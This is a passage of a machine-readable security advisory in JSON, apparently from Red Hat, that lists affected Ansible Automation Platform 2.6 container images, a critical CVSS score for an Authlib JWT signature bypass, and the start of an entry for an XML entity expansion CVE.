"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access"
},
{
"cve": "CVE-2026-29074",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"discovery_date": "2026-03-06T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
